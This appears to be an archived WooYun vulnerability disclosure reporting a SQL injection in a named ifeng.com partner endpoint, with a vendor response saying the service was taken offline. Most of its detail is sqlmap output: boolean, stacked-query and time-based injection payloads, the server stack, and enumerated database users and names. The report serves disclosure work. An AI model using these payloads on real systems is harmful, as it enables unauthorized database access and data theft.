漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0133386
漏洞标题:神器而已之凤凰网某站存在SQL注入
相关厂商:凤凰网
漏洞作者: ago
提交时间:2015-08-11 17:01
修复时间:2015-09-26 10:12
公开时间:2015-09-26 10:12
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-08-11: 细节已通知厂商并且等待厂商处理中
2015-08-12: 厂商已经确认,细节仅向厂商公开
2015-08-22: 细节向核心白帽子及相关领域专家公开
2015-09-01: 细节向普通白帽子公开
2015-09-11: 细节向实习白帽子公开
2015-09-26: 细节向公众公开
简要描述:
神器而已。。
详细说明:
http://astro.wap.ifeng.com:8080/asxh/Jiyun.ashx
post注入sku=G1501031235&MethodName=GetProductSales
Parameter: sku
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sku=G1501031235' AND 5907=5907 AND 'fZIc'='fZIc&MethodName=GetProdu
ctSales
Vector: AND [INFERENCE]
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: sku=G1501031235'; WAITFOR DELAY '0:0:5';--&MethodName=GetProductSal
es
Vector: ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]';--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: sku=G1501031235' WAITFOR DELAY '0:0:5'--&MethodName=GetProductSales
Vector: IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
---
[16:50:47] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
漏洞证明:
database management system users [2]:
[*] sa
[*] userforjy360
available databases [11]:
[*] db_AqiooConn
[*] db_AqiooFree
[*] db_AqiooMall
[*] db_AqiooName
[*] db_AqiooPlat
[*] db_AqiooWap
[*] db_JiyunMall
[*] master
[*] model
[*] msdb
[*] tempdb
修复方案:
过滤,转义
版权声明:转载请注明来源 ago@乌云
漏洞回应
厂商回应:
危害等级:低
漏洞Rank:5
确认时间:2015-08-12 10:10
厂商回复:
这是一个合作方的业务,我们一直联系不到合作方“阿启网”,目前已停止解析,非常感谢您对凤凰网信息安全的帮助。
最新状态:
暂无